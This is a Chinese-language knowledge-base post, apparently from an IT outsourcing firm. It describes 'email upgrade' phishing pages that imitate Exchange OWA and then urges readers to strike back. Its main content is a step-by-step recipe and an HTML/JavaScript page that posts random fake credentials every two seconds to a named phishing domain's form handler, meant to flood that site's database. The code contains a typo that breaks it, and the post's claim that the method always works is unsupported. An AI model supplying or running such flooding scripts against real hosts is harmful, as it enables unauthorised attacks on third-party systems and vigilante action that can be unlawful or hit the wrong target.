知识库
随着垃圾邮件组织越来越猖狂,我们会经常收到需要升级你电子邮件系统的邮件,
邮件的内容一般都是提醒公司的电子邮件系统需要升级或者迁移,一些防范心比较差的办公人员或者刚好碰到公司有在电子邮件升级的时候,都会打开电邮的连接
打开电子邮件提供的地址后,出现的页面很像 Microsoft Exchange Server 的 OWA 系统,非常具有迷惑性
如果你按照实际情况输入你的电子邮件信息,你的电子邮件地址就会被垃圾邮件组织利用发送垃圾邮件.进而会导致整个公司的域名被反垃圾邮件组织设定为黑名单.严重影响公司的正常业务运作.
“升级电邮”肆虐背后,是一条渐成产业的灰色利益链条。“升级电邮”作者采用欺骗方式推广,发送大量的垃圾邮件,并从软件厂商或职业推广人处获取利益。据了解,通过这条利益链,职业推广人和“升级电邮”作者等均从中获益。而大量因此遭受损失的个人和企业用户,维权困难重重。
碰到这样的情况,建议大家不要删除这个邮件,润满科技会教大家一手,让这个专门骗取大家电子邮箱信息的骗子公司崩溃掉.请大家跟着我的步骤走
第一步,先打开他们的页面,在页面上点右键,查看网页源代码
找到<form 开头,其中一段是 action=”order.asp”类似的
记录下来,然后加上他们网站的地址
得到最终的地址是 <http://www.tenceno.pw/order.asp> ,请记得保存下来.
第二步:复制我下面的代码,替换 <form 中 action=”” 中间的即可,然后另存为 Mail.HTML 文件,用 IE 打开,他会自动运行,每2秒会写一条数据到他们数据库,然后他们再也找不到他们需要的数据了
代码如下
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"> <title>Crack Mail</title> </head> <body > <!-- 请修改 action 的地址即可 --> <FORM name=myform id=myform action="http://www.tenceno.pw/order.asp" method=post target="xxx"> <input type="hidden" id="formdir" name="formdir" value="1"> 公司名称 <input class="txt" id="a" name="a" type="text" value="a"> 公司域名 <input class="txt" id="b" name="b" type="text" value="b"> 登陆地址 <input class="txt" id="c" name="c" type="text" value="c"><br> 邮箱帐号 <input class="txt" id="d" name="d" type="text" value="d"> 邮箱密码 <input class="txt" id="e" name="e" type="text" value="e"> 历史密码 <input class="txt" id="f" name="f" type="text" value="f"> <br> <input class="btn" id="SubmitCreds" type="submit" value="点击升级" name="SubmitCreds"> <br> <iframe id=xxx name="xxx" width="900" height="400"></iframe> </form> <script language="javascript"> setInterval("a()",2000); function a() { myform.a.value=randomString(); myform.b.value=randomString(); myform.c.value=randomString(); myform.d.value=randomString(); myform.e.value=randomString(); myform.e.value=randomString(); myform.f.value=randomString(); myform.SubmitCreds.click(); myform.submit() } function randomString() { len=Math.floor(Math.random() * ( 10 + 2))+1 ; var $chars = 'ABCDEFGHJKMNPQRSTWXYZabcdefhijkmnprstwxyz2345678oOLl9gqVvUu'; var maxPos = $chars.length; var pwd = ''; for (i = 0; i < len; i++) { pwd += $chars.charAt(Math. Floor(Math.random() * maxPos)); } return pwd; } </script> </body></html>
问题1:这个方法可行吗?
可行,目前大部分的骗取电子邮件账号信息的系统都是这样的运行的.屡试不爽.
问题2:为什么要这样做?
你为什么要这样做?保护个人信息不被非法利用,人人有责.我为什么要这么做?我是专业给中小企业提供IT外包服务,有责任告诉我们的客户,防范企业信息系统安全有效和稳定,打击那些骗子公司.